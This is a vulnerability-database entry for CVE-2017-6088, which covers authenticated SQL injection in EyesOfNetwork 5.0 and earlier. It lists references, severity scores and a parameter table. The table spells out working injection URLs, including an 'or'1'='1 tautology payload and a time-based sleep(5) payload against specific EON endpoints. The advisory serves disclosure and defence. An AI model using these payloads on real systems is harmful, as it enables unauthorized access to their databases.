CVE-2017-6088

🗓️ 11 Apr 2017 18:00:00Reported by mitreType

cve🔗 web.nvd.nist.gov👁 57 Views🌐 WEB

Multiple SQL injection vulnerabilities in EyesOfNetwork (aka EON) 5.0 and earlier allow remote authenticated users to execute arbitrary SQL commands

Reporter	Title	Published	Views	Family All 12
0day.today	EON 5.0 SQL Injection Vulnerability	25 Mar 201700:00	–	zdt
0day.today	EyesOfNetwork (EON) 5.0 - SQL Injection Vulnerability	28 Mar 201700:00	–	zdt
CNVD	EyesOfNetwork SQL Injection Vulnerability	13 Apr 201700:00	–	cnvd
Cvelist	CVE-2017-6088	11 Apr 201718:00	–	cvelist
Exploit DB	EyesOfNetwork (EON) 5.0 - SQL Injection	27 Mar 201700:00	–	exploitdb
EUVD	EUVD-2017-15154	7 Oct 202500:30	–	euvd
exploitpack	EyesOfNetwork (EON) 5.0 - SQL Injection	27 Mar 201700:00	–	exploitpack
NVD	CVE-2017-6088	11 Apr 201718:59	–	nvd
OpenVAS	Eyes Of Network (EON) <= 5.0 Multiple Security Vulnerabilities	24 May 201700:00	–	openvas
OSV	CVE-2017-6088	11 Apr 201718:59	–	osv

NVD

Node

eyesofnetwork eyesofnetworkRange≤5.0

Source	Link
openwall	www.openwall.com/lists/oss-security/2017/03/23/4
securityfocus	www.securityfocus.com/bid/97084
sysdream	www.sysdream.com/news/lab/2017-03-14-cve-2017-6088-eon-5-0-multiple-sql-injection/
exploit-db	www.exploit-db.com/exploits/41747/

Parameter	Position	Path	Description	CWE
action	query param	module/admin_bp/php/function_bp.php?action=list_process&bp_name=&display=%27or%271%27=%271	SQL injection via bp_name/display parameters in list_process (authenticated).	CWE-89
bp_name	query param	module/admin_bp/php/function_bp.php?action=list_process&bp_name=&display=%27or%271%27=%271	SQL injection via bp_name/display parameters in list_process (authenticated).	CWE-89
display	query param	module/admin_bp/php/function_bp.php?action=list_process&bp_name=&display=%27or%271%27=%271	SQL injection via bp_name/display parameters in list_process (authenticated).	CWE-89
action	query param	module/admin_bp/php/function_bp.php?action=list_process&bp_name=%27or%271%27=%271&display=1	SQL injection via bp_name/display parameters in list_process (authenticated).	CWE-89
bp_name	query param	module/admin_bp/php/function_bp.php?action=list_process&bp_name=%27or%271%27=%271&display=1	SQL injection via bp_name/display parameters in list_process (authenticated).	CWE-89
display	query param	module/admin_bp/php/function_bp.php?action=list_process&bp_name=%27or%271%27=%271&display=1	SQL injection via bp_name/display parameters in list_process (authenticated).	CWE-89
queue	query param	module/monitoring_ged/ajax.php?queue=active&type=1%27+AND+(SELECT+sleep(5))+AND+%271%27=%271&owner=&filter=equipment&search=&ok=on&warning=on&critical=on&unknown=on&daterange=&time_period=&ack_time=	SQL injection via type parameter causing delayed response (sleep).	CWE-89
type	query param	module/monitoring_ged/ajax.php?queue=active&type=1%27+AND+(SELECT+sleep(5))+AND+%271%27=%271&owner=&filter=equipment&search=&ok=on&warning=on&critical=on&unknown=on&daterange=&time_period=&ack_time=	SQL injection via type parameter causing delayed response (sleep).	CWE-89
owner	query param	module/monitoring_ged/ajax.php?queue=active&type=1%27+AND+(SELECT+sleep(5))+AND+%271%27=%271&owner=&filter=equipment&search=&ok=on&warning=on&critical=on&unknown=on&daterange=&time_period=&ack_time=	SQL injection via type parameter causing delayed response (sleep).	CWE-89
filter	query param	module/monitoring_ged/ajax.php?queue=active&type=1%27+AND+(SELECT+sleep(5))+AND+%271%27=%271&owner=&filter=equipment&search=&ok=on&warning=on&critical=on&unknown=on&daterange=&time_period=&ack_time=	SQL injection via type parameter causing delayed response (sleep).	CWE-89

13 May 2026 00:24Current

7.7High risk

Vulners AI Score7.7

CVSS 37.2

CVSS 29

EPSS0.06903

CWE-89